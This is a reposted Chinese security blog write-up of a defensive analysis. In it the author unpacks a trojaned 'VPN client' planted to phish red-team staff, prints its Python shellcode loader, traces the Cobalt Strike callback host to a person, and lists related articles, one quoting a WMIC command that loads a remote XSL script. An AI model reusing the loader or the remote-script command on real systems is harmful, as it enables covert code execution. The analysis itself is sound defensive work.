<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰 | 記一次某次攻防演練種的分析溯源

    VSole2022-07-14 08:01:12

    在某次攻防演練信息收集的過程中,偶然發現偽裝Github信息泄漏進而釣魚紅隊人員的后門。

    下面展開有趣的分析溯源過程。

    0x01 信息收集

    GIthub信息泄漏

    根據甲方信息進行常規的Github敏感信息收集偶然發現一個倉庫不簡單

    這不是mysql賬號密碼泄漏了嗎,愉快的打開Navicat

    失敗....于是訪問源碼的8080端口查看一番,發現一個管理后臺

    弱口令

    針對后臺嘗試一波弱口令,admin/admin 嗯~進來了

    進來之后竟然發現賬號密碼而且客戶端解壓密碼都貼心的放了出來

    到這里我竟然沒有察覺到任何異常,以為能夠拿到VPN入口權限;抓緊下載VPN客戶端。

    解壓出來這個樣子,emmm。。還沒發現異常

    0x02 分析溯源

    還好有謹慎的習慣,放入虛擬機瞅瞅。

    哦豁,竟然提示不兼容當前系統;看到彈窗有Pyhton代碼編寫的特征。感覺到前面的打點由過于絲滑,不自然的警覺了起來。

    包括前面弱口令的提交方式竟然為admin.php?user=admin&passwd=admin

    由于發現VPN客戶端為python語言編寫,更不對勁了,反編譯看下。

    解包

    python3 pyinstxtractor.py vpnclient64.exe
    

    生成一個以 exe文件名+_extracted 的文件夾,這個就是解包后的數據

    PyInstaller打包后,pyc文件的前8個字節會被抹掉,所以最后要自己添加回去。

    添加頭

    根據struct.py文件

    源碼

    得到py文件,easyvpn64.py為后門主程序,其中執行shellcode代碼隱藏至圖片中。

    通過requests請求OSS存儲中的圖片,圖片內容為shellcode加載器。

    shellcodeLoader部分

    import base64
    import ctypes
    str = b''
    sc_base64 = (base64.a85decode(str)).decode('utf-8')
    shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))
    ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0),
                                                 ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
    

    知道shellcodeloader加載方式就好辦了,提取CS回連地址。

    溯源

    回連地址:Host: cs.xxx.cn

    nslookup解析地址

    根據IP地址定位在某宿舍

    直接溯源到人,tg結合一波。

    0x03 總結

    在攻防演練過程中一定要小心,防止被釣魚。另外這個釣魚的兄弟已經小本本記下了。。。

    本文轉載:HACK學習君

    原文地址:自先知社區、https://xz.aliyun.com/t/11275

    作者:kat

    base64溯源
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    溯源排查中比較重要的一環是web突破口排查,攻擊者通過web突破口入侵時,有極大的概率會寫入webshell,本文介紹下常見的webshell排查方法和流程。
    通過監測設備發現一個攻擊IP,其資產為某藥房企業,疑似為紅隊跳板,經過溯源,最終確定為該IP為紅隊跳板,感覺本次溯源有不少收獲,且很有意思,因此將溯源過程記錄下來。
    在2021hw期間,通過監測設備發現一個攻擊IP,其資產為某藥房企業,疑似為紅隊跳板,經過溯源,最終確定為該IP為紅隊跳板,感覺本次溯源有不少收獲,且很有意思,因此將溯源過程記錄下來。
    記一次有趣的溯源
    2022-08-05 08:40:49
    在某次攻防演練信息收集的過程中,偶然發現偽裝Github信息泄漏進而釣魚紅隊人員的后門。
    記一次實戰溯源
    2022-05-12 08:22:05
    解壓出來這個樣子,emmm。。還沒發現異常0x02 分析溯源還好有謹慎的習慣,放入虛擬機瞅瞅。
    云函數簡介 云函數是騰訊云為企業和開發者們提供的無服務器執行環境,可以無需購買和管理服務器的情況下運行代碼。只需使用平臺支持的語言編寫核心代碼并設置代碼運行的條件,即可在騰訊云基礎設施上彈性、安全地運行代碼。SCF是實時文件處理和數據處理等場景下理想的計算平臺。服務端配置云函數基礎配置選擇自定義創建,地域自選,部署模式,代碼部署,運行環境Python3.6,其余默認即可。
    前段時間參加公司舉辦的紅藍對抗演習,幫助藍軍分析并溯源樣本。拿到樣本時,就一個xsl類型的文件,和一個用來執行該樣本的命令行,如下所示: C:/Windows/SysWOW64/wbem/WMIC.exe os get /format:"http://ip/scripts/1.xsl"
    在某次攻防演練信息收集的過程中,偶然發現偽裝Github信息泄漏進而釣魚紅隊人員的后門。解壓出來這個樣子,emmm。。還沒發現異常分析溯源還好有謹慎的習慣,放入虛擬機瞅瞅。哦豁,竟然提示不兼容當前系統;看到彈窗有Pyhton代碼編寫的特征。感覺到前面的打點由過于絲滑,不自然的警覺了起來。包括前面弱口令的提交方式竟然為admin.php?user=admin&passwd=admin由于發現VPN客戶端為python語言編寫,更不對勁了,反編譯看下。知道shellcodeloader加載方式就好辦了,提取CS回連地址。
    攻防演練中的分析溯源
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类